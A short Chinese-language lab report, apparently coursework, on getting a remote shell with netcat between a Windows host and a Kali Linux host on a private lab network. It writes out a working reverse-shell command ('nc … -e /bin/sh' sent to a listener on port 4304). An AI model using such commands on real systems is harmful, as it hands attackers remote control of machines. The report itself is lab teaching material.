实验内容

准备工作

在cmd中获得Windows的IP地址：192.168.3.125

在终端模拟器中获得kali的IP地址，需要先使用命令export PATH=/usr/sbin/:$PATH转到ifconfig所在目录为/usr/sbin下，再使用ifconfig获得IP地址：192.168.3.180

一、使用netcat获取主机操作Shell，cron启动

打开powershell，跳转至ncat工具所在目录之中，并输入指令ncat.exe -l -p 4304 ，通过ncat工具监测4304端口

然后进入Linux终端输入nc 192.168.3.125 4304 -e /bin/sh，反弹连接Windows

windows获得kali中linux的shell，验证后，以ls为例，反弹连接成功